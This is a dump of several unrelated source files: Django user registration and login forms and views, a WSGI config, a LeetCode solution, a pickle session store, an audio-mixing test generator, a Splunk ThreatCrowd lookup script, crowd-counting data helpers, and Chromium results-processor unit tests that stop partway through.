    # User-facing labels/messages are intentionally kept in Chinese.
    email = forms.CharField(label='邮箱',
                            max_length=128,
                            required=True,
                            error_messages={
                                'required': '输入正确的邮箱,建议使用QQ邮箱或者163邮箱'
                            })
    password = forms.CharField(label='用户密码',
                               max_length=256,
                               required=True,
                               error_messages={
                                   'required': '密码一定要滴'
                               })
    nickname = forms.CharField(label='昵称',
                               max_length=16,
                               required=True,
                               error_messages={
                                   'required': '昵称不可为空'
                               })
    def clean_email(self):
        """
        Validate the e-mail format and make sure it is not already registered.
        :return: email
        """
        email = self.cleaned_data['email']
        pattern = r'^\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*$'
        if not re.search(pattern, email):
            raise forms.ValidationError('邮箱%s输入有问题',
                                        code='invalid_email',
                                        params=(email, ))
        if User.objects.filter(email=email).exists():
            raise forms.ValidationError('邮箱%s已经存在啦',
                                        code='exist_email',
                                        params=(email, ))
        return email
    def clean_nickname(self):
        """
        Make sure the nickname is not already taken.
        :return: nickname
        """
        nickname = self.cleaned_data['nickname']
        if User.objects.filter(nickname=nickname).exists():
            raise forms.ValidationError('昵称%s已被使用啦',
                                        code='exist_nickname',
                                        params=(nickname, ))
        return nickname
    def clean(self):
        # Log the cleaned payload; skip cross-field work if any field failed.
        data = super().clean()
        logs.info(data)
        if self.errors:
            return
        return data
    @transaction.atomic()
    def do_register(self, request):
        """
        Perform the registration inside a transaction.
        :param request: the HTTP request object
        :return: True on success, None on any failure (logged)
        """
        data = self.cleaned_data
        version = request.headers.get('version', '')
        source = request.headers.get('source', '')
        try:
            # 1. Create the base auth user record.
            user = User.objects.create_user(
                email=data.get('email', None),
                username=data.get('email', None),
                password=data.get('password', None),
                nickname=data.get('nickname', None)
            )
            # 2. Create the detailed profile record.
            user_info = UserInfo.objects.create(
                user=user,
                username=user.username,
                email=user.email,
                version=version,
                source=source
            )
            # 3. Log the new user in immediately.
            login(request, user)
            # 4. Record login timestamps.
            user.last_login = now()
            user.date_joined = now()
            user.save()
            ip = request.META.get('REMOTE_ADDR', '')
            # 5. Record the login history entry.
            user.add_login_record(
                username=user.username,
                ip=ip,
                version=version,
                source=source
            )
            return True
        except Exception as e:
            # NOTE(review): broad catch returns None and swallows the cause;
            # callers only see a falsy result — confirm this is intended.
            logs.error(e)
            return None
class LoginForm(forms.Form):
    """
    Login form: validates the email-style username, authenticates the
    credentials, and performs the login with history recording.
    """
    username = forms.CharField(label='用户',
                               max_length=100,
                               required=False,
                               help_text='用户邮箱',
                               initial='2501070055@qq.com')
    password = forms.CharField(label='密码',
                               max_length=200,
                               min_length=6,
                               widget=forms.PasswordInput)
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # The user authenticated by clean(); set before do_login() runs.
        self.user = None
    def clean_username(self):
        """Field-level hook: the username must look like an e-mail address."""
        username = self.cleaned_data['username']
        pattern = r'^\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*$'
        if not re.search(pattern, username):
            raise forms.ValidationError('邮箱%s输入不正确',
                                        code='invalid_email',
                                        params=(username, ))
        return username
    def clean(self):
        data = super().clean()
        logs.info(data)
        # If any single field failed, return early and skip authentication.
        if self.errors:
            return
        username = data.get('username', None)
        password = data.get('password', None)
        user = authenticate(username=username, password=password)
        if user is None:
            raise forms.ValidationError('用户名不存在或者密码不正确')
        else:
            if not user.is_active:
                raise forms.ValidationError('该用户已经被禁用')
            self.user = user
        return data
    @transaction.atomic()
    def do_login(self, request):
        """Log the authenticated user in; returns True on success, None on failure."""
        try:
            user = self.user
            # Establish the session.
            login(request, user)
            # Refresh the last-login timestamp.
            user.last_login = now()
            user.save()
            # Record the login history entry.
            ip = request.META.get('REMOTE_ADDR', '')
            version = request.headers.get('version', '')
            source = request.headers.get('source', '')
            user.add_login_record(
                username=user.info.username,
                ip=ip,
                version=version,
                source=source
            )
            return True
        except Exception as e:
            # NOTE(review): broad catch swallows the cause; callers only
            # get a falsy result — confirm this is intended.
            logs.error(e)
            return None
class DetailForm(forms.Form):
    """Profile-edit form: updates signature, sex, age, avatar, and username."""
    username = forms.CharField(label='用户名',
                               required=False)
    signature = forms.CharField(label='个性签名',
                                required=False,
                                help_text='个性签名',
                                initial='这个人太懒了,什么也没有留下')
    sex = forms.ChoiceField(choices=SexChoices.choices,
                            required=False,
                            initial=0)
    age = forms.DecimalField(label='年龄',
                             min_value=0,
                             max_value=200,
                             max_digits=16,
                             decimal_places=0,
                             initial=18,
                             required=False)
    avatar = forms.ImageField(label='图片',
                              required=False)
    def clean_sex(self):
        # Empty submission defaults to '1' (male, per SexChoices — see
        # the validation message); only 0/1 are accepted.
        sex = self.cleaned_data.get('sex')
        if sex == '':
            sex = '1'
        if int(sex) not in (0, 1):
            raise forms.ValidationError('只能填0或者1,1为男,0为女')
        return sex
    def clean_age(self):
        # Missing age defaults to '18'.
        age = self.cleaned_data.get('age')
        if age is None:
            age = '18'
        return age
    def clean(self):
        data = super().clean()
        logs.info(data)
        # If any single field failed, return early and skip cross-field work.
        if self.errors:
            return
        return data
    @transaction.atomic()
    def do_change_detail(self, request):
        """
        Persist the edited profile fields onto request.user.info.
        :return: True on success, None on failure (logged)
        """
        try:
            user = request.user
            data = self.cleaned_data
            signature = data.get('signature', '')
            sex = data.get('sex', '')
            age = data.get('age', '')
            avatar = data.get('avatar', '')
            username = data.get('username', '')
            user.info.user_id = user.id
            user_info = user.info
            # Rename an uploaded avatar to a random+timestamp filename to
            # avoid collisions, keeping the original extension.
            if avatar is not None:
                ext = avatar.name.split('.')[-1]
                new_avatar_name = str(random.randint(111111, 999999)) + datetime.datetime.now().strftime('%Y%m%d_%H%M%S')
                avatar.name = '{}'.format(new_avatar_name) + '.' + ext
                user_info.avatar = request.FILES.get('avatar')
            user_info.signature = signature
            user_info.sex = sex
            user_info.age = age
            user_info.username = username
            user_info.save()
            return True
        except Exception as e:
            # NOTE(review): broad catch swallows the cause; callers only
            # get a falsy result — confirm this is intended.
            logs.error(e)
            return None
| [
"noreply@github.com"
] | 2501070055.noreply@github.com |
08c9f961074cb25d9eab1cf25d4fdfef08792002 | 70f66599f8e4f3294a14f317af20d54c8fde440c | /beyondhealthhack/beyondhealthhack/wsgi.py | ef92a34382d0d77f5851333b0a69d1da7eed97d1 | [] | no_license | Jh123x/Beyond-health-hack-2021 | b91bad078e83028adc0459c7e13434fb7ae75ec4 | c8208bb4989cce8ada9766b7de0b719f536f9d96 | refs/heads/main | 2023-06-22T11:53:11.390969 | 2021-07-14T14:55:18 | 2021-07-14T14:55:18 | 382,859,218 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 409 | py | """
WSGI config for beyondhealthhack project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Ensure Django knows which settings module to use before the app is built.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'beyondhealthhack.settings')
# WSGI servers (gunicorn, mod_wsgi, ...) import this module-level callable.
application = get_wsgi_application()
| [
"wenjh1998@gmail.com"
] | wenjh1998@gmail.com |
2a8fdd258e6761431797bfe4ce7c1e78c398dc5a | cb6d7c967c0f5068e5a2add3723b612839ba07b0 | /user/views.py | 81db221b1bb82cc957687f083bcf73fcac9c225d | [] | no_license | ChanoPark/sj_chat_backend | 97eb7580767ce00cb85ba703c827a57315888e9e | 7165c942b8b1e37281dcc8b76382275caf6b36d1 | refs/heads/main | 2023-02-26T19:22:20.524187 | 2021-02-03T05:35:58 | 2021-02-03T05:35:58 | 332,686,593 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,899 | py | from django.contrib.auth.models import User #기본유저모델
from django.forms.models import model_to_dict #모델을 딕셔너리형태로 반환
from rest_framework import status
from rest_framework.response import Response # json형태로 반환하기 위함
from rest_framework.decorators import api_view, permission_classes, authentication_classes
#api_view: 어떤 메소드 형태로 들어왔는지, json을 딕셔너리 형태로 만듬
#permission_classes: 로그인한 유저만 들어올지말지 / 3번째는 이유모름
from rest_framework.permissions import IsAuthenticated #로그인 했는지 안했는지
from user.serializer import UserShortcutSerializer
@api_view(['POST'])  # registration is accepted via POST only
def register(request):
    """Create a new user account.

    Expects JSON with username, password, first_name, last_name and email.
    Returns 409 when the username or email is already taken, 201 with the
    created user on success, and 400 when a required field is missing.
    """
    data = request.data
    required_fields = ('username', 'password', 'first_name', 'last_name', 'email')
    # Proceed only when every required field is present.
    if all(field in data for field in required_fields):
        user_check = User.objects.filter(username=data['username'])
        email_check = User.objects.filter(email=data['email'])
        if user_check.exists():
            return Response({"message": "아이디가 존재합니다."}, status=status.HTTP_409_CONFLICT)
        elif email_check.exists():
            return Response({"message": "이메일이 존재합니다."}, status=status.HTTP_409_CONFLICT)
        else:
            user = User.objects.create_user(
                data['username'],
                data['email'],
                data['password'],
            )
            user.first_name = data['first_name']
            user.last_name = data['last_name']
            user.save()
            return Response(model_to_dict(user), status=status.HTTP_201_CREATED)
    else:
        # BUG FIX: rest_framework.status has no HTTP_BAD_REQUEST attribute;
        # the original raised AttributeError here instead of returning 400.
        return Response({"message": "key error"}, status=status.HTTP_400_BAD_REQUEST)
@api_view(['GET'])  # profile lookup is read-only
@permission_classes((IsAuthenticated,))  # unauthenticated callers get 401
def my_profile(request):
    """Return the authenticated user's profile, filtered by the serializer."""
    serialized = UserShortcutSerializer(request.user)
    return Response(serialized.data, status=status.HTTP_200_OK)
| [
"koc081900@korea.ac.kr"
] | koc081900@korea.ac.kr |
7d51d7a2ed6f5210cb3d90865585ac7981656575 | 5950c456b9b347d67c8f9bdbbc99060d4a3bc6d4 | /152.Maximum Product Subarray.py | 23d3e4c7ff1bc1a4a41b9d8506da482772ff4210 | [] | no_license | redrumshinning/Leetcode | c24541eab864281ff07315ca81c5cccb9da559e0 | 5ded4c79f567639042bcf6eb71ece910f54a5af9 | refs/heads/master | 2020-03-26T13:05:10.825896 | 2019-07-31T09:34:41 | 2019-07-31T09:34:41 | 144,922,610 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 685 | py | class Solution(object):
def maxProduct(self, nums):
"""
动态规划
nums会有负数,所以在保存最大值时如果遇到负数不做保存的话,后面如果有
另一个负数,最大值就不对了,所以同时保存最大值和最小值
:type nums: List[int]
:rtype: int
"""
maxvalue = minvalue = nums[0]
globalmax = nums[0]
for i in range(1,len(nums)):
temp = maxvalue
maxvalue = max(temp*nums[i],minvalue*nums[i],nums[i])
minvalue = min(temp*nums[i],minvalue*nums[i],nums[i])
globalmax = max(globalmax,maxvalue)
return globalmax | [
"1184761736@qq.com"
] | 1184761736@qq.com |
8d3e9d28c7d3cbb3972f10322e33431fd9210f4f | 982cee5d250b972e2a8c2aaa9ad9648661435119 | /src/my_session.py | 535077020f45a49b4bc9fa9e1db4b777ac29f0f3 | [] | no_license | yewberry/mycollector | ac9d6f0663a11d0d1223845805732fce731351dc | 6bd7585bff6541753f6c8b90b9f24c15709a2b41 | refs/heads/master | 2021-01-20T02:37:29.674866 | 2017-09-01T10:05:51 | 2017-09-01T10:05:51 | 89,429,662 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 896 | py | # -*- coding: utf-8 -*-
import os
import cPickle
from my_glob import LOG
from my_glob import Singleton
class MySession(object):
    """Pickle-backed key/value session store; shared instance via Singleton."""
    __metaclass__ = Singleton

    def __init__(self, file_path=""):
        LOG.info(u"session path:{}".format(file_path))
        self.file_path = file_path
        self.session = {}
        if self.file_path == "":
            LOG.error("session file path is empty which shouldn't happen")
        elif os.path.isfile(self.file_path):
            # Restore the previously persisted session dict.
            with open(self.file_path, "rb") as fp:
                self.session = cPickle.load(fp)

    def get(self, key, default=None):
        """Return the stored value, or *default* when absent or stored as None."""
        stored = self.session.get(key)
        return default if stored is None else stored

    def set(self, key, val):
        """Store *val* under *key* and persist the whole session to disk."""
        self.session[key] = val
        with open(self.file_path, "wb") as fp:
            cPickle.dump(self.session, fp, cPickle.HIGHEST_PROTOCOL)
| [
"yewberry@163.com"
] | yewberry@163.com |
66cc1a4ea3850ef7dfca7e84bf4c5b041a488acf | 87752d226647cf42e925c0264a2355d8ea513be2 | /gen_tests.py | 14e6091043381f999fff252fb0743c163f9143ce | [] | no_license | AlbertoEAF/BSS | 401d7d5af12d004c0ec6fcc11807e1ec95f97a49 | a683c01acb83a94268380fa6d11a035953ab26b8 | refs/heads/master | 2021-03-27T20:46:14.280319 | 2014-10-02T03:24:33 | 2014-10-02T03:24:33 | 23,039,104 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,832 | py | #! /usr/bin/python3
from os import listdir
from os.path import isfile, join
import os
import subprocess as sub
import re
from ConfigParser import *
from color_codes import *
from parse_run import *
def raw_string(s):
    """Return *s* with control characters escaped (e.g. '\\n' -> '\\\\n').

    Non-string inputs are returned unchanged.

    BUG FIX: the 'string-escape' codec and the ``unicode`` type exist only
    in Python 2; under this script's python3 shebang the original raised
    LookupError / NameError. 'unicode-escape' is the Python 3 equivalent
    for str input.
    """
    if isinstance(s, str):
        s = s.encode('unicode-escape').decode('ascii')
    return s
def listdir_waves(dirpath):
    """Names of the .wav files directly inside *dirpath* (no recursion)."""
    return [name for name in listdir(dirpath) if name.endswith(".wav")]
def get_wav_files(dirpath, pattern):
    """Names of the .wav files in *dirpath* whose name matches the regexp *pattern*."""
    wave_names = listdir_waves(dirpath)
    return [name for name in wave_names if re.match(pattern, name)]
def print_wavlist(name, dirpath, full_list, partial_list):
    """Print *full_list*, highlighting entries also in *partial_list*, plus a count."""
    pieces = ["{}{} @ {}: {}".format(YELLOW, name, dirpath, NOCOLOR)]
    for wav in full_list:
        if wav in partial_list:
            # Selected files are shown in cyan.
            pieces.append("{}{}{} ".format(CYAN, wav, NOCOLOR))
        else:
            pieces.append(wav + " ")
    pieces.append("{}({}/{})\n{}\n".format(YELLOW, len(partial_list), len(full_list), NOCOLOR))
    print("".join(pieces), end="")
def exclude(f, f_ref, exclusion_rules):
    """Return True when *f* and *f_ref* violate any of the *exclusion_rules*.

    Implemented only for filenames shaped GnN.wav, where G is the speaker's
    gender (one char), n the speaker number (one char) and N the sentence,
    so f[:2] identifies the subject and f[2:] the sentence.
    """
    checks = {
        'same': f == f_ref,
        'same_sex': f[0] == f_ref[0],
        'same_subject': f[:2] == f_ref[:2],
        'same_sentence': f[2:] == f_ref[2:],
    }
    return any(flag for rule, flag in checks.items() if rule in exclusion_rules)
def gen_test(test_file):
    """Expand and run the mixture tests described by *test_file*.

    Reads the test definition (mixer mode, source patterns, exclusion
    rules), expands every combination of matching .wav files, filters the
    combinations through the exclusion rules, and — for the 'mix' mixer —
    runs the mixing/evaluation pipeline on each surviving combination.
    """
    test = ConfigParser(test_file)
    rules = test['exclusion_rules'].split()
    sources = test['sources'].split()
    N = len(sources)
    print(YELLOW, "\nN =", N, NOCOLOR, "\n")

    dirs = []
    files = []
    for n in range(N):
        # Each source entry is "<directory>/<filename regexp>".
        dirpath = sources[n][:sources[n].rfind('/')]
        pattern = sources[n][sources[n].rfind('/')+1:]
        dirs.append(dirpath)
        files.append(get_wav_files(dirpath, pattern))
        print_wavlist("s"+str(n), dirpath, listdir_waves(dirpath), files[n])

    import itertools
    combinations = []
    combs_count = 0
    excls_count = 0
    for combination in itertools.product(*files):
        combs_count += 1
        exclude_flag = False
        # BUG FIX: the original iterated n2 over range(1, N), so for N >= 3
        # it also compared a file with itself (n1 == n2 == 1), which made
        # the 'same' rule exclude every combination. Compare each unordered
        # pair of distinct sources exactly once.
        for n1 in range(N - 1):
            for n2 in range(n1 + 1, N):
                if exclude(combination[n1], combination[n2], rules):
                    exclude_flag = True
        if exclude_flag:
            excls_count += 1
        else:
            combinations.append(combination)
    print(YELLOW, "(", combs_count-excls_count, "/", combs_count, ")\n", NOCOLOR, sep="")

    if test['mixer'] == 'mix':
        for i_c in range(len(combinations)):
            c = combinations[i_c]
            print("Testing (", i_c, "/", len(combinations), ") : ", c, sep="")
            sub.check_call(['mix'] + [dirs[n] + '/' + c[n] for n in range(N)])
            # Remove stale logs before re-running the evaluation.
            sub.check_call(["rm", "-f", "ecoduet.log", "bss_eval.log"])
            out = sub.check_output(['r', 'omni.cfg'])
            (o, e) = parse_run("ecoduet.log", "bss_eval.log")
            print(RED, o, e, NOCOLOR)
    elif test['mixer'] == 'csim':
        print("Not implemented yet!")
        exit(1)
    else:
        print("Invalid mixer mode!")
        exit(1)
gen_test('t.test')
| [
"albertoeafworks@gmail.com"
] | albertoeafworks@gmail.com |
c4765a14009d0d9a9af8c24c57ca868d88a1d5ba | 479898d0162fd9b00a43dfcc5f3a9db899ea8c09 | /bin/threatcrowd.py | 14e652b6f324cb66df2a5e5bf6b8839aa9dfa65c | [
"MIT"
] | permissive | Tmvrdummy11/osweep | bf09bc1b4960856d477a7f0c093e7c4194650a68 | 1d987ef95854df637d7222932f88331365c0e71c | refs/heads/master | 2020-04-12T13:01:58.349172 | 2018-12-19T23:45:54 | 2018-12-19T23:45:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,288 | py | #!/opt/splunk/bin/python
"""
Description: Use ThreatCrowd to quickly identify related infrastructure and
malware. The script accepts a list of strings (domains, IPs, or email addresses):
| threatcrowd <IOCs>
or input from the pipeline (any field where the value is a domain, IP, and/or
email address). The first argument is the name of one field:
<search>
| fields <IOC_FIELD>
| threatcrowd <IOC_FIELD>
Output: List of dictionaries
Source: https://www.threatcrowd.org/index.php
Instructions:
1. Switch to the ThreatCrowd dashboard in the OSweep app.
2. Add the list of IOCs to the "IP, Domain, or Email (+)" textbox.
3. Select the IOC type.
4. Click "Submit".
Rate Limit: 1 request/10s
Results Limit: None
Notes: None
Debugger: open("/tmp/splunk_script.txt", "a").write("{}: <MSG>\n".format(<VAR>))
"""
import os
import sys
from time import sleep
script_path = os.path.dirname(os.path.realpath(__file__)) + "/_tp_modules"
sys.path.insert(0, script_path)
import validators
import commons
api = "http://www.threatcrowd.org/searchApi/v2/{}/report/?{}={}"
def process_iocs(results):
    """Return data formatted for Splunk from ThreatCrowd.

    *results* is either a list of dicts whose values are IOCs (pipeline
    input) or None, in which case IOCs are taken from the command line.
    """
    if results is not None:
        provided_iocs = [y for x in results for y in x.values()]
    else:
        provided_iocs = sys.argv[1:]

    session = commons.create_session()
    splunk_table = []

    for provided_ioc in set(provided_iocs):
        provided_ioc = commons.deobfuscate_url(provided_ioc)

        # Map the IOC to the endpoint type ThreatCrowd expects; anything
        # that is not an IPv4 address, domain or email is reported invalid.
        if validators.ipv4(provided_ioc):
            ioc_type = "ip"
        elif validators.domain(provided_ioc):
            ioc_type = "domain"
        elif validators.email(provided_ioc):
            ioc_type = "email"
        else:
            splunk_table.append({"invalid": provided_ioc})
            continue

        # Single query path replaces the original's duplicated ip/domain vs
        # email branches, which issued the exact same call.
        for ioc_dict in query_threatcrowd(provided_ioc, ioc_type, session):
            splunk_table.append(ioc_dict)

        if len(provided_iocs) > 1:
            sleep(10)  # ThreatCrowd rate limit: 1 request / 10 s

    session.close()
    return splunk_table
def query_threatcrowd(provided_ioc, ioc_type, session):
    """Query ThreatCrowd for *provided_ioc* and return a list of result dicts."""
    ioc_dicts = []
    resp = session.get(api.format(ioc_type, ioc_type, provided_ioc), timeout=180)

    # A real hit must both succeed and echo the IOC back in its permalink.
    if resp.status_code == 200 and "permalink" in resp.json().keys() and \
    provided_ioc in resp.json()["permalink"]:
        for key in resp.json().keys():
            # Skip metadata keys that carry no pivot data.
            if key == "votes" or key == "permalink" or key == "response_code":
                continue
            elif key == "resolutions":
                # Resolutions are already dicts; just lowercase their keys.
                for res in resp.json()[key]:
                    res = commons.lower_keys(res)
                    ioc_dicts.append(res)
            else:
                # Scalar lists become one {key: value} dict per value.
                for value in resp.json()[key]:
                    key = commons.lower_keys(key)
                    ioc_dicts.append({key: value})
    else:
        ioc_dicts.append({"no data": provided_ioc})
    return ioc_dicts
if __name__ == "__main__":
    # Splunk invokes this script directly; hand this module to the shared
    # results dispatcher in commons.
    current_module = sys.modules[__name__]
    commons.return_results(current_module)
| [
"theemailaddressishare@gmail.com"
] | theemailaddressishare@gmail.com |
5514cf98695a998af222480eea475c9dc957363c | abf2ee47a829fdb6557edc1a7a13bc5a0d204485 | /crowd_counting/crowdcounting/application/picture_lib.py | f9fb68523866aec464c3cf675c1bd51692e1bb52 | [
"MIT"
] | permissive | buyeah1109/Crowdedness-Detector-with-3D-Visualization | 5a208699a32255de599ecca6541b78788b73d97b | 8aa2db813ee4abff58d06fc2cfee3a3a5f34558b | refs/heads/main | 2023-02-24T21:12:45.173928 | 2021-01-31T06:13:14 | 2021-01-31T06:13:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,525 | py | import numpy as np
from PIL import Image
import os
rootdir = os.path.join('./data/npy')
def fetch(loc, floor, section):
    """Return the .npy path for loc/floor/section, or None with a message."""
    target = loc + '_' + floor + '_' + section
    for (dirpath, dirnames, filenames) in os.walk(rootdir):
        for filename in filenames:
            name, ext = os.path.splitext(filename)
            # Records are stored as '<loc>_<floor>_<section>.npy'.
            if ext == '.npy' and name == target:
                return './data/npy/' + filename
    # BUG FIX: the original printed the typo 'NO RESULTS FOUNG' and fell
    # off the end of the function (implicit None).
    print('NO RESULTS FOUND')
    return None
def getCount(loc, floor, section):
    """Return the stored people count ('cnt') for loc/floor/section, or None."""
    target = loc + '_' + floor + '_' + section
    for (dirpath, dirnames, filenames) in os.walk(rootdir):
        for filename in filenames:
            name, ext = os.path.splitext(filename)
            if ext == '.npy' and name == target:
                picpath = './data/npy/' + filename
                pic_info = np.load(picpath, allow_pickle=True)
                return pic_info.item().get('cnt')
    # BUG FIX: corrected the 'NO RESULTS FOUNG' typo; return None explicitly.
    print('NO RESULTS FOUND')
    return None
def getCrowdness(loc, floor, section):
    """Return the stored crowdedness value ('cr') for loc/floor/section, or None."""
    target = loc + '_' + floor + '_' + section
    for (dirpath, dirnames, filenames) in os.walk(rootdir):
        for filename in filenames:
            name, ext = os.path.splitext(filename)
            if ext == '.npy' and name == target:
                picpath = './data/npy/' + filename
                pic_info = np.load(picpath, allow_pickle=True)
                return pic_info.item().get('cr')
    # BUG FIX: corrected the 'NO RESULTS FOUNG' typo; return None explicitly.
    print('NO RESULTS FOUND')
    return None
def fetchAll(loc, floor, section):
    """Return paths of all .npy records whose loc/floor/section start with
    the given prefixes (empty prefixes match everything)."""
    filelist = []
    for (dirpath, dirnames, filenames) in os.walk(rootdir):
        for filename in filenames:
            if os.path.splitext(filename)[1] != '.npy':
                continue
            picpath = './data/npy/' + filename
            record = np.load(picpath, allow_pickle=True).item()
            # Prefix matching replaces the original slice comparisons
            # (record['loc'][0:len(loc)] == loc, etc.).
            if (record.get('loc', '').startswith(loc)
                    and record.get('floor', '').startswith(floor)
                    and record.get('section', '').startswith(section)):
                # BUG FIX: the original opened the record's image here
                # (Image.open) without ever using or closing it — a file
                # handle leak with no effect on the returned list.
                filelist.append(picpath)
    if not filelist:
        print('NO RESULTS FOUND')  # BUG FIX: corrected 'FOUNG' typo
    return filelist
| [
"z1054276327@gmail.com"
] | z1054276327@gmail.com |
abd3bcdbedfbf53aa74ec49c4c5efae200ede1c3 | 536656cd89e4fa3a92b5dcab28657d60d1d244bd | /tools/perf/core/results_processor/command_line_unittest.py | 5dd1f9abc72545c59b4f8dfebf02d90dec2e566e | [
"Zlib",
"LGPL-2.0-or-later",
"LGPL-2.1-only",
"MIT",
"APSL-2.0",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"LGPL-2.0-only",
"LicenseRef-scancode-unknown"
] | permissive | ECS-251-W2020/chromium | 79caebf50443f297557d9510620bf8d44a68399a | ac814e85cb870a6b569e184c7a60a70ff3cb19f9 | refs/heads/master | 2022-08-19T17:42:46.887573 | 2020-03-18T06:08:44 | 2020-03-18T06:08:44 | 248,141,336 | 7 | 8 | BSD-3-Clause | 2022-07-06T20:32:48 | 2020-03-18T04:52:18 | null | UTF-8 | Python | false | false | 7,545 | py | # Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unit tests for results_processor.
These tests mostly test that argument parsing and processing work as expected.
They mock out accesses to the operating system, so no files are actually read
nor written.
"""
import datetime
import posixpath
import re
import unittest
import mock
from core.results_processor import command_line
# To easily mock module level symbols within the command_line module.
def module(symbol):
    """Fully qualified name of *symbol* inside the command_line module."""
    return '.'.join(['core.results_processor.command_line', symbol])
class ProcessOptionsTestCase(unittest.TestCase):
  """Base fixture: patches os/path helpers so no real filesystem is touched."""

  def setUp(self):
    # Subclasses flip this to exercise the standalone argument parser.
    self.standalone = False
    # Mock os module within results_processor so path manipulations do not
    # depend on the file system of the test environment.
    mock_os = mock.patch(module('os')).start()

    def realpath(path):
      return posixpath.normpath(posixpath.join(mock_os.getcwd(), path))

    def expanduser(path):
      return re.sub(r'~', '/path/to/home', path)

    mock_os.getcwd.return_value = '/path/to/curdir'
    mock_os.path.realpath.side_effect = realpath
    mock_os.path.expanduser.side_effect = expanduser
    mock_os.path.dirname.side_effect = posixpath.dirname
    mock_os.path.join.side_effect = posixpath.join
    # Fixed stand-in directories so assertions can use literal paths.
    mock.patch(module('_DefaultOutputDir'),
               return_value='/path/to/output_dir').start()
    mock.patch(module('path_util.GetChromiumSrcDir'),
               return_value='/path/to/chromium').start()

  def tearDown(self):
    mock.patch.stopall()

  def ParseArgs(self, args):
    """Parse *args* and run ProcessOptions, returning the options object."""
    parser = command_line.ArgumentParser(standalone=self.standalone)
    options = parser.parse_args(args)
    command_line.ProcessOptions(options)
    return options
class TestProcessOptions(ProcessOptionsTestCase):
  """ProcessOptions behavior in the default (non-standalone) mode."""

  def testOutputDir_default(self):
    options = self.ParseArgs([])
    self.assertEqual(options.output_dir, '/path/to/output_dir')

  def testOutputDir_homeDir(self):
    options = self.ParseArgs(['--output-dir', '~/my_outputs'])
    self.assertEqual(options.output_dir, '/path/to/home/my_outputs')

  def testOutputDir_relPath(self):
    options = self.ParseArgs(['--output-dir', 'my_outputs'])
    self.assertEqual(options.output_dir, '/path/to/curdir/my_outputs')

  def testOutputDir_absPath(self):
    options = self.ParseArgs(['--output-dir', '/path/to/somewhere/else'])
    self.assertEqual(options.output_dir, '/path/to/somewhere/else')

  @mock.patch(module('datetime'))
  def testIntermediateDir_default(self, mock_datetime):
    # Freeze the clock so the timestamped directory name is predictable.
    mock_datetime.datetime.utcnow.return_value = (
        datetime.datetime(2015, 10, 21, 7, 28))
    options = self.ParseArgs(['--output-dir', '/output'])
    self.assertEqual(options.intermediate_dir,
                     '/output/artifacts/run_20151021T072800Z')

  @mock.patch(module('datetime'))
  def testIntermediateDir_withResultsLabel(self, mock_datetime):
    mock_datetime.datetime.utcnow.return_value = (
        datetime.datetime(2015, 10, 21, 7, 28))
    options = self.ParseArgs(
        ['--output-dir', '/output', '--results-label', 'test my feature'])
    # Spaces in the label become underscores in the directory name.
    self.assertEqual(options.intermediate_dir,
                     '/output/artifacts/test_my_feature_20151021T072800Z')

  def testUploadBucket_noUploadResults(self):
    options = self.ParseArgs([])
    self.assertFalse(options.upload_results)
    self.assertIsNone(options.upload_bucket)

  @mock.patch(module('cloud_storage'))
  def testUploadBucket_uploadResultsToDefaultBucket(self, mock_storage):
    mock_storage.BUCKET_ALIASES = {'output': 'default-bucket'}
    options = self.ParseArgs(['--upload-results'])
    self.assertTrue(options.upload_results)
    self.assertEqual(options.upload_bucket, 'default-bucket')

  @mock.patch(module('cloud_storage'))
  def testUploadBucket_uploadResultsToBucket(self, mock_storage):
    mock_storage.BUCKET_ALIASES = {'output': 'default-bucket'}
    options = self.ParseArgs(
        ['--upload-results', '--upload-bucket', 'my_bucket'])
    self.assertTrue(options.upload_results)
    self.assertEqual(options.upload_bucket, 'my_bucket')

  @mock.patch(module('cloud_storage'))
  def testUploadBucket_uploadResultsToAlias(self, mock_storage):
    # Bucket aliases are resolved to their real bucket names.
    mock_storage.BUCKET_ALIASES = {
        'output': 'default-bucket', 'special': 'some-special-bucket'}
    options = self.ParseArgs(
        ['--upload-results', '--upload-bucket', 'special'])
    self.assertTrue(options.upload_results)
    self.assertEqual(options.upload_bucket, 'some-special-bucket')

  def testDefaultOutputFormat(self):
    options = self.ParseArgs([])
    self.assertEqual(options.output_formats, ['html'])

  def testUnkownOutputFormatRaises(self):
    with self.assertRaises(SystemExit):
      self.ParseArgs(['--output-format', 'unknown'])

  def testNoDuplicateOutputFormats(self):
    options = self.ParseArgs(
        ['--output-format', 'html', '--output-format', 'csv',
         '--output-format', 'html', '--output-format', 'csv'])
    # Repeated formats are collapsed to a single entry each.
    self.assertEqual(options.output_formats, ['csv', 'html'])

  def testTraceProcessorPath_noBuildDir(self):
    with mock.patch(module('os.environ.get'), return_value=None):
      options = self.ParseArgs([])
    self.assertIsNone(options.trace_processor_path)

  def testTraceProcessorPath_chromiumOutputDir(self):
    # CHROMIUM_OUTPUT_DIR takes precedence when it contains the binary.
    def isfile(path):
      return path == '/path/to/chromium/out_test/Debug/trace_processor_shell'
    def env_get(name):
      if name == 'CHROMIUM_OUTPUT_DIR':
        return '/path/to/chromium/out_test/Debug'
    with mock.patch(module('os.path.isfile')) as isfile_patch:
      with mock.patch(module('os.environ.get')) as env_patch:
        isfile_patch.side_effect = isfile
        env_patch.side_effect = env_get
        options = self.ParseArgs([])
    self.assertEqual(options.trace_processor_path,
                     '/path/to/chromium/out_test/Debug/trace_processor_shell')

  def testTraceProcessorPath_oneBuildDir(self):
    def isfile(path):
      return path == '/path/to/chromium/out/Release/trace_processor_shell'
